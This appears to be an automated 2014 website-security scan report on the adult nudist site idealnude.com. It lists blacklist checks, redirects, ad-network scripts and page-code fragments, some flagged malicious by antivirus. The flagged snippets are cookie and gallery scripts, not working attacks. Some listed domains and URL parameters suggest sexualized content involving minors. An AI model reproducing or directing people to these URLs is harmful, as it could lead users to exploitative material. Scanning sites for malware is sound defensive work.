Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=idealnude.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://idealnude.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://idealnude.com/ | 200 OK Content-Length: 17467 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: uncensored-films.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:45:36 GMT; path=/;'; document.cookie='te3bookmark=1410723936; expires=Mon, 14 Sep 2015 19:45:36 G ...[4459 bytes skipped]... | ||
http://ads.juicyads.com/jsclients/jac.js | 200 OK Content-Length: 91344 Content-Type: application/x-javascript | clean |
http://adspaces.ero-advertising.com/adspace/279281.js | 200 OK Content-Length: 4050 Content-Type: application/javascript | clean |
http://idealnude.com/t/out.php?l=100&id=nudist-naturist.net | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:37 GMT Location: http://nudist-naturist.net Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=6079.; expires=Sun, 14-Sep-2014 22:45:37 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxudWRpc3QtbmF0dXJpc3QubmV0fDE6bnVkaXN0LW5hdHVyaXN0Lm5ldA%3D%3D; expires=Mon, 15-Sep-2014 19:45:37 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://nudist-naturist.net/ | 200 OK Content-Length: 34959 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: littlenudistworld.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:46:18 GMT; path=/;'; document.cookie='te3bookmark=1410723978; expires=Mon, 14 Sep 2015 19:46:18 GMT; path= ...[4443 bytes skipped]... | ||
http://pu.plugrush.com/4g6k.js | 200 OK Content-Length: 3544 Content-Type: text/javascript | clean |
http://idealnude.com/t/out.php?id=nudistlog.com | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:39 GMT Location: http://nudistlog.com Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=8792.; expires=Sun, 14-Sep-2014 22:45:39 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxudWRpc3Rsb2cuY29tfDE6bnVkaXN0bG9nLmNvbQ%3D%3D; expires=Mon, 15-Sep-2014 19:45:39 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://nudistlog.com/ | 200 OK Content-Length: 65488 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: uncensored-films.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:45:40 GMT; path=/;'; document.cookie='te3bookmark=1410723940; expires=Mon, 14 Sep 2015 19:45:40 GMT; path= ...[4565 bytes skipped]... | ||
http://syndication.exoclick.com/splash.php?cat=143&idsite=135696&idzone=768625&login=oceanude&type=4 | 200 OK Content-Length: 4213 Content-Type: text/html | clean |
http://syndication.exoclick.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://gogousenet.com/tools/promo2.cgi?aid=1998309&cat=&group=23007014&cb=&var=ssssssssnssssssssnssssssssnssssssssnssssssss&target=_blank&show=0000&kw=Sex&lnk=set | 200 OK Content-Length: 11717 Content-Type: text/javascript | clean |
http://gogousenet.com/tools/promo2.cgi?aid=1998309&cat=&group=23006324&cb=&var=ssssssssnssssssssnssssssssnssssssssnssssssss&target=_blank&show=0000&kw=Sex&lnk=set | 200 OK Content-Length: 12922 Content-Type: text/javascript | clean |
http://syndication.exoclick.com/ads.php?type=300x250&login=oceanude&cat=139&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=738553&idsite=135696 | 200 OK Content-Length: 649 Content-Type: text/javascript | clean |
http://idealnude.com/t/out.php?id=anygalleries.com | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:42 GMT Location: http://www.anygalleries.com/nudist.html?f=pure-nudist.com Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=2815.; expires=Sun, 14-Sep-2014 22:45:42 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxhbnlnYWxsZXJpZXMuY29tfDE6YW55Z2FsbGVyaWVzLmNvbQ%3D%3D; expires=Mon, 15-Sep-2014 19:45:42 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://www.anygalleries.com/nudist.html?f=pure-nudist.com | 200 OK Content-Length: 126675 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.cookie="st=visit"; Antivirus reports:
| ||
http://www.anygalleries.com/open.php?g=nudistgalleries&u=http%3A%2F%2Fwww.variousgalleries.com%2Fnudist%2Fimages.html%3Fgallery%3Dteentitties&i=1205-1-s | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:37 GMT Location: http://www.variousgalleries.com/nudist/images.html?gallery=teentitties Server: Apache/2.2.15 (CentOS) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Set-Cookie: trace= Set-Cookie: trace=%7Csys_contenturl%7Enudistgalleries%7C; expires=Mon, 15-Sep-2014 19:45:37 GMT Set-Cookie: clickday= Set-Cookie: clickday=1; expires=Tue, 16-Sep-2014 19:45:37 GMT Set-Cookie: clickall= Set-Cookie: clickall=1; expires=Mon, 14-Sep-2015 19:45:37 GMT X-Powered-By: PHP/5.3.3 | clean |
http://www.variousgalleries.com/nudist/images.html?gallery=teentitties | 200 OK Content-Length: 11689 Content-Type: text/html | clean |
http://www.variousgalleries.com/gallery.js | 200 OK Content-Length: 9183 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var error=0;
var subscribe_video=""; var relif_tred = new Array(0,0,0,0,0,0,0,0,0,0,0); function Request (name) { var pname = name + '='; var ps = window.location.search; if (typeof(request_bypass)!="undefined") { if (request_bypass==1) { return "request_bypassed"; } } if (ps.length > 0) { var start = ps.indexOf (pname); if (start != -1) { start += pname.length; var { var pfix; if (i<10) { pfix=name+"-00"; } else if (i<100) { pfix=name+"-0"; } else { pfix=name+"-";} var out=pfix+i; var mx=c % m; var sk=i % skip; if (sk!=0) { document.write ("<img src=http://www.l7cos.com/screenlists/"+name+"/"+out+".jpg width="+w+" height="+h+" alt='Video screen list'>"); if (mx==0) { document.write ("<br>"); } c++; } } } Antivirus reports:
| ||
http://www.anygalleries.com/../open.php?g=nudist&l=1&s=n&p=100&u=http%3A%2F%2Fwww.showgalleries.com%2Ftraffic.php%3Ff%3Dgallery_thumbs%26g%3Dnudist | 400 Bad Request Content-Length: 312 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: idealnude.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Sep 2014 19:45:36 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: idealnude.com
Referer: http://www.google.com/search?q=idealnude.com
Result:
The result is similar to the first query. There are no suspicious redirects found.